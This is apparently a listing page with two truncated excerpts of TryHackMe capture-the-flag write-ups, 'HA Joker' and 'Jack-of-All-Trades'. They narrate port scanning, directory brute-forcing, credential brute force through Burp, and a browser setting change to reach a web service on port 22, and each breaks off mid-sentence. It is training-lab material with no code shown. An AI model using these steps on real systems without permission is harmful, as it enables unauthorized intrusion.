HA Joker CTF TryHackMe | HA Joker CTF this room is medium rated first of all, as we used to do we will run Nmap scan against our target as we can see you have three ports open ssh and two HTTP services so let's take a look at web app that is running on port 80 we have here a web page with a lot of joker's quotes let's take a look at the page source to see if there any interesting info we can find hmm there is no useful info so let's visit the second service on port 8080 it requires a username and password to access this page ok let's run gobuster against port 80 and what will we find great we found some directories and some answers also one of those files you will found contains a username, note it and now we have a username time to get its password we will use brute force attack to gain access to services on port 8080 but the hint says that this username and password encoded with base64 so let's run burp and take a close look by intercepting th
Jack-of-All-Trades TryHackMe | Jack-of-All-Trades First of all, this write up is quite long so be patient and stay tunned coz it's a fun box and you may learn something new so take your notes and let's jump into this machine starting with enumeration we ganna use Nmap for that to see what ports and services are running as we can see there are web service and ssh but both of them running on different ports so keep that in mind let's go to the website and check this out but first, we need to allow HTTP to run port 22 you need to follow these steps 1- Select and copy the following preference name network.security.ports.banned.override 2- In a new tab, type or paste about:config in the address bar and press Enter/Return. Click the button promising to be careful. 3- In the search box above the list, type or paste ports and pause while the list is filtered If the above-listed preference exists: 4- Double-click it and add a comma to the end of the list followed by the port numb